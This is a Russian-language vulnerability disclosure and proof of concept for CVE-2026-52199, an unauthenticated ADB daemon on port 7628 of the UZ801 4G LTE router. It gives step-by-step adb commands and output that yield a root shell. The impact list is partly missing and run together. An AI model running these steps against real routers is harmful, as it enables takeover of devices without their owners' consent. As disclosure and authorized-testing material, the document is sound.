
Эксплойт для CVE-2026-52199: неаутентифицированное удаленное выполнение кода через открытый демон ADB на маршрутизаторе UZ801 4G LTE. Включает анализ уязвимости, оценку воздействия и пошаговое руководство по эксплуатации для авторизованного тестирования безопасности.
Критическая уязвимость Incorrect Access Control существует в Generic OEM UZ801_v2.1 4G LTE Router (Firmware V3.4.3). Устройство неправильно раскрывает неаутентифицированный демон Android Debug Bridge (ADB) (/sbin/adbd) на TCP-порту 7628 для соседней сети (LAN/WiFi).
Злоумышленник, подключенный к локальной сети устройства, может использовать эту ошибку для обхода всех механизмов аутентификации, установления ADB-соединения и выполнения произвольного кода с привилегиями root.

/sbin/adbdЭксплуатация этой уязвимости приводит к полной компрометации системы. Воздействие включает:
root)Процесс эксплуатации не требует специальных инструментов, кроме стандартного клиента adb и доступа к соседней сети.
Шаг 1: Подключитесь к сети WiFi маршрутизатора UZ801 (обычно шлюз по умолчанию — 192.168.100.1).
Шаг 2: Просканируйте устройство на наличие открытых портов. Порт 7628/TCP будет отображаться как открытый.
Шаг 3: С машины злоумышленника инициируйте ADB-соединение с недокументированным портом:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
Шаг 4: Запросите интерактивную оболочку:
$ adb -s 192.168.100.1:7628 shell
Шаг 5: Злоумышленник немедленно получает root-оболочку без каких-либо запросов аутентификации:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
Только для образовательных целей и авторизованных исследований безопасности.
Информация и доказательство концепции, предоставленные в этом репозитории, предназначены исключительно для образовательных целей и помощи в обеспечении безопасности сетей. Автор (lamaper) не несет ответственности за любое неправомерное использование этой информации. Не используйте эту эксплойт против устройств или сетей, которыми вы не владеете или на тестирование которых не имеете явного разрешения.